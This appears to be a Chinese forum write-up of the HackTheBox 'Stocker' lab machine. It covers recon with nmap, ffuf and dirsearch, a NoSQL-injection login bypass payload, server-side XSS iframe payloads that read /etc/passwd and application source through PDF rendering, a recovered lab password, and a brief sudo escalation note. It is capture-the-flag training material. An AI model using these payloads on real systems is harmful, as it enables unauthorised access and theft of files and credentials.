-
-
[原创]HTB Stocker (easy)
-
发表于: 2023-1-26 14:01
-
上来还是信息收集,扫端口扫域名,扫目录
第一次 扫描发现状态码 301的很多,过滤下
这里的 过滤不是太会用 ,好像老版本的ffuf有过滤参数,有大佬会教下
dirsearch -u http://stocker.htb/
再扫一下dev下的
dirsearch -u http://dev.stocker.htb/
访问http://dev.stocker.htb/login登陆页面
我们需要身份认证绕过,在这个网址里可以看到相关知识
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass
完成登陆绕过,到 /stock页面
网站是个购物网站,将物品添加到购物车然后结账
点击结算页面的here后获得到一个pdf形式的账单
“title”反馈在pdf中,“orderId”反馈到url
尝试在title处尝试xss
"title":"<iframe src=file:///etc/passwd></iframe>"
相关知识:https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
修改下宽高
找到一个angoose用户
使用插件可以 看出网站使用的node.js
尝试读下js文件
"<iframe src=file:///var/www/dev/index.js height=750px width=750px></iframe>"
获得密码IHeardPassphrasesArePrettySecure
尝试登录angoose:IHeardPassphasesArePrettySecure
sudo -l发现 指定目录下的js文件都能以root权限运行
写一个shell使用目录遍历执行它
sudo nmap -sS -sV -sC 10.10.11.196
sudo nmap -sS -sV -sC 10.10.11.196
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs 169 -mc 200,204,302,307,401,403,404,405,500
ffuf -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u http://stocker.htb -H "Host:FUZZ.stocker.htb" -fs 169 -mc 200,204,302,307,401,403,404,405,500
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }
Content-Type: application/json
{"username": {"$ne": null}, "password": {"$ne": null} }
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
